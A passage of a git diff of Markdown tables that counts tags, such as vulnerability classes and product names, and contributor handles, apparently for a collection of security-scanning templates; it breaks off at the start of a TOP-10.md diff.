| randomrobbie | 2 | | | | | | | +| django | 6 | alifathi-h1 | 2 | | | | | | | +| api | 6 | davidmckennirey | 2 | | | | | | | +| cve2008 | 6 | moritz nentwig | 2 | | | | | | | +| docker | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| nodejs | 5 | random-robbie | 2 | | | | | | | +| drupal | 5 | joeldeleep | 2 | | | | | | | +| wp-theme | 5 | socketz | 2 | | | | | | | +| java | 5 | mohammedsaneem | 2 | | | | | | | +| deserialization | 5 | 0xsapra | 2 | | | | | | | +| tomcat | 5 | udit_thakkur | 2 | | | | | | | +| iis | 5 | huowuzhao | 2 | | | | | | | +| jolokia | 5 | ehsahil | 2 | | | | | | | +| lucee | 5 | x1m_martijn | 2 | | | | | | | +| printer | 5 | parth | 2 | | | | | | | +| circarlife | 5 | 0xcrypto | 2 | | | | | | | +| ssti | 5 | r3naissance | 2 | | | | | | | +| microsoft | 5 | gal nagli | 2 | | | | | | | +| windows | 5 | unstabl3 | 2 | | | | | | | +| fileupload | 5 | hahwul | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| headless | 5 | convisoappsec | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| strapi | 4 | nkxxkn | 2 | | | | | | | +| proxy | 4 | fabaff | 2 | | | | | | | +| exchange | 4 | manas_harsh | 2 | | | | | | | +| grafana | 4 | afaq | 2 | | | | | | | +| hp | 4 | pxmme1337 | 2 | | | | | | | +| webserver | 4 | sushantkamble | 2 | | | | | | | +| vpn | 4 | g4l1t0 | 2 | | | | | | | +| asp | 4 | zomsop82 | 2 | | | | | | | +| crlf | 4 | bsysop | 2 | | | | | | | +| hongdian | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | johnjhacking | 2 | | | | | | | +| thinkphp | 4 | vavkamil | 2 | | | | | | | +| symfony | 4 | gevakun | 2 | | | | | | | +| elastic | 4 | bp0lr | 2 | | | | | | | +| symantec | 4 | 0xelkomy | 2 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| zimbra | 4 | b0rn2r00t | 1 | | | | | | | +| glpi | 4 | mubassirpatel | 1 | | | | | | | +| buffalo | 4 | yavolo | 1 | | | | | | | +| solarwinds | 4 | shifacyclewla | 1 | | | | | | | +| artifactory | 4 | deena | 1 | | | | | | | +| firmware | 4 | akash.c | 1 | | | | | | | +| magmi | 4 | absshax | 1 | | | | | | | +| wso2 | 4 | c3l3si4n | 1 | | | | | | | +| thinkcmf | 4 | geraldino2 | 1 | | | | | | | +| resin | 4 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| samsung | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| cacti | 3 | mah3sec_ | 1 | | | | | | | +| druid | 3 | andysvints | 1 | | | | | | | +| zabbix | 3 | ahmed sherif | 1 | | | | | | | +| ofbiz | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| kevinlab | 3 | remonsec | 1 | | | | | | | +| kibana | 3 | elder tao | 1 | | | | | | | +| opensis | 3 | sicksec | 1 | | | | | | | +| linkerd | 3 | shreyapohekar | 1 | | | | | | | +| bypass | 3 | fmunozs | 1 | | | | | | | +| microstrategy | 3 | vzamanillo | 1 | | | | | | | +| smtp | 3 | andirrahmani1 | 1 | | | | | | | +| mongodb | 3 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| prometheus | 3 | streetofhackerr007 | 1 | | | | | | | +| r-seenet | 3 | blckraven | 1 | | | | | | | +| springcloud | 3 | co0nan | 1 | | | | | | | +| targa | 3 | @dwisiswant0 | 1 | | | | | | | +| ssh | 3 | kba@sogeti_esec | 1 | | | | | | | +| terramaster | 3 | iampritam | 1 | | | | | | | +| openssh | 3 | b0yd | 1 | | | | | | | +| bigip | 3 | @github.com/defr0ggy | 1 | | | | | | | +| telerik | 3 | jeya seelan | 1 | | | | | | | +| nacos | 3 | ringo | 1 | | | | | | | +| injection | 3 | revblock | 1 | | | | | | | +| camera | 3 | udyz | 1 | | | | | | | +| itop | 3 | s1r1u5_ | 1 | | | | | | | +| httpd | 3 | yashanand155 | 1 | | | | | | | +| log | 3 | naglinagli | 1 | | | | | | | +| firebase | 3 | tim_koopmans | 1 | | | | | | | +| lfr | 3 | ajaysenr | 1 | | | | | | | +| fpd | 3 | ooooooo_q | 1 | | | | | | | +| jellyfin | 3 | thezakman | 1 | | | | | | | +| mail | 3 | alex | 1 | | | | | | | +| caucho | 3 | kabirsuda | 1 | | | | | | | +| fanruan | 3 | petruknisme | 1 | | | | | | | +| vbulletin | 3 | omarkurt | 1 | | | | | | | +| amazon | 3 | knassar702 | 1 | | | | | | | +| kafka | 3 | divya_mudgal | 1 | | | | | | | +| slack | 3 | patralos | 1 | | | | | | | +| nosqli | 3 | d0rkerdevil | 1 | | | | | | | +| backups | 3 | fopina | 1 | | | | | | | +| git | 3 | toufik airane | 1 | | | | | | | +| bitrix | 3 | luci | 1 | | | | | | | +| nexus | 3 | undefl0w | 1 | | | | | | | +| openam | 3 | thevillagehacker | 1 | | | | | | | +| ebs | 3 | exploitation | 1 | | | | | | | +| tikiwiki | 3 | sshell | 1 | | | | | | | +| npm | 3 | bad5ect0r | 1 | | | | | | | +| oa | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| oauth | 2 | bernardofsr | 1 | | | | | | | +| backdoor | 2 | 0xrod | 1 | | | | | | | +| nextjs | 2 | x6263 | 1 | | | | | | | +| axis2 | 2 | pdp | 1 | | | | | | | +| yapi | 2 | defr0ggy | 1 | | | | | | | +| sonarqube | 2 | taielab | 1 | | | | | | | +| igs | 2 | sullo | 1 | | | | | | | +| prestashop | 2 | intx0x80 | 1 | | | | | | | +| leak | 2 | b4uh0lz | 1 | | | | | | | +| paloalto | 2 | 0xteles | 1 | | | | | | | +| adminer | 2 | izn0u | 1 | | | | | | | +| middleware | 2 | regala_ | 1 | | | | | | | +| splunk | 2 | bjhulst | 1 | | | | | | | +| trixbox | 2 | mesaglio | 1 | | | | | | | +| axis | 2 | sec_hawk | 1 | | | | | | | +| odoo | 2 | whynotke | 1 | | | | | | | +| maian | 2 | 0h1in9e | 1 | | | | | | | +| favicon | 2 | philippdelteil | 1 | | | | | | | +| azure | 2 | furkansenan | 1 | | | | | | | +| seeyon | 2 | j33n1k4 | 1 | | | | | | | +| wordfence | 2 | kre80r | 1 | | | | | | | +| idrac | 2 | zhenwarx | 1 | | | | | | | +| icewarp | 2 | alph4byt3 | 1 | | | | | | | +| cve2005 | 2 | ohlinge | 1 | | | | | | | +| rockethchat | 2 | _darrenmartyn | 1 | | | | | | | +| db | 2 | push4d | 1 | | | | | | | +| waf | 2 | 52971 | 1 | | | | | | | +| voipmonitor | 2 | makyotox | 1 | | | | | | | +| nagios | 2 | luskabol | 1 | | | | | | | +| liferay | 2 | ldionmarcil | 1 | | | | | | | +| storage | 2 | ilovebinbash | 1 | | | | | | | +| ilo | 2 | sy3omda | 1 | | | | | | | +| chamilo | 2 | cookiehanhoan | 1 | | | | | | | +| openfire | 2 | wabafet | 1 | | | | | | | +| huawei | 2 | manuelbua | 1 | | | | | | | +| frp | 2 | gboddin | 1 | | | | | | | +| hashicorp | 2 | aresx | 1 | | | | | | | +| shellshock | 2 | _harleo | 1 | | | | | | | +| xxljob | 2 | flag007 | 1 | | | | | | | +| spark | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| smb | 2 | soyelmago | 1 | | | | | | | +| flir | 2 | apt-mirror | 1 | | | | | | | +| saltstack | 2 | berkdusunur | 1 | | | | | | | +| sonicwall | 2 | borna nematzadeh | 1 | | | | | | | +| globalprotect | 2 | kurohost | 1 | | | | | | | +| hjtcloud | 2 | hanlaomo | 1 | | | | | | | +| glassfish | 2 | willd96 | 1 | | | | | | | +| node | 2 | retr0 | 1 | | | | | | | +| ucmdb | 2 | hakluke | 1 | | | | | | | +| dos | 2 | mass0ma | 1 | | | | | | | +| couchdb | 2 | _c0wb0y_ | 1 | | | | | | | +| akkadian | 2 | shelld3v | 1 | | | | | | | +| cache | 2 | tirtha_mandal | 1 | | | | | | | +| mcafee | 2 | pudsec | 1 | | | | | | | +| hasura | 2 | becivells | 1 | | | | | | | +| rstudio | 2 | th3.d1p4k | 1 | | | | | | | +| guacamole | 2 | ipanda | 1 | | | | | | | +| hoteldruid | 2 | affix | 1 | | | | | | | +| jeedom | 2 | sickwell | 1 | | | | | | | +| hostheader-injection | 2 | evolutionsec | 1 | | | | | | | +| natshell | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| kong | 2 | notsoevilweasel | 1 | | | | | | | +| nextcloud | 2 | chron0x | 1 | | | | | | | +| status | 2 | ratnadip gajbhiye | 1 | | | | | | | +| fortios | 2 | rodnt | 1 | | | | | | | +| keycloak | 2 | mhdsamx | 1 | | | | | | | +| grav | 2 | ahmetpergamum | 1 | | | | | | | +| mida | 2 | infosecsanyam | 1 | | | | | | | +| ecology | 2 | me9187 | 1 | | | | | | | +| prtg | 2 | qlkwej | 1 | | | | | | | +| jboss | 2 | akshansh | 1 | | | | | | | +| jsf | 2 | raesene | 1 | | | | | | | +| webcam | 2 | noamrathaus | 1 | | | | | | | +| phpcollab | 2 | daviey | 1 | | | | | | | +| geowebserver | 2 | micha3lb3n | 1 | | | | | | | +| netis | 2 | rojanrijal | 1 | | | | | | | +| akamai | 2 | schniggie | 1 | | | | | | | +| showdoc | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| chiyu | 2 | elmahdi | 1 | | | | | | | +| service | 2 | smaranchand | 1 | | | | | | | +| hpe | 2 | yashgoti | 1 | | | | | | | +| cve2007 | 2 | 0xtavian | 1 | | | | | | | +| ec2 | 2 | nytr0gen | 1 | | | | | | | +| emerge | 2 | aceseven (digisec360) | 1 | | | | | | | +| pega | 2 | kareemse1im | 1 | | | | | | | +| rockmongo | 2 | adrianmf | 1 | | | | | | | +| dolibarr | 2 | alperenkesk | 1 | | | | | | | +| netsweeper | 2 | bolli95 | 1 | | | | | | | +| harbor | 2 | pratik khalane | 1 | | | | | | | +| bucket | 2 | 0ut0fb4nd | 1 | | | | | | | +| avantfax | 2 | zandros0 | 1 | | | | | | | +| yii | 2 | juicypotato1 | 1 | | | | | | | +| vrealize | 2 | its0x08 | 1 | | | | | | | +| activemq | 2 | jteles | 1 | | | | | | | +| github | 2 | dawid-czarnecki | 1 | | | | | | | +| plesk | 2 | | | | | | | | | +| sharepoint | 2 | | | | | | | | | +| kentico | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| horde | 2 | | | | | | | | | +| bruteforce | 2 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| micrsoft | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| chyrp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| minio | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| openvpn | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| tidb | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 869329e073..8f2daf4bdb 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | -| 